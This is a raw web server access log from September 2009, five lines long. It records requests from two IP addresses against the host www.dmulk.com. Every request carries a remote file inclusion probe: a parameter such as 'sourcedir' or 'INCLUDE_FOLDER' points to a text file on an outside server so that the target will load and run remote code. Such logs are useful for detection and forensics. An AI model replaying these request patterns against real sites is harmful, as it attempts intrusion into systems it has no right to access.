219.85.63.226 - - [07/Sep/2009:11:15:42 -0700] "GET /logs/access_080304.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:48 -0700] "GET /logs/access_080304.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:15:48 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:15:59 -0700] "GET /logs/access_090509.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:15:59 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
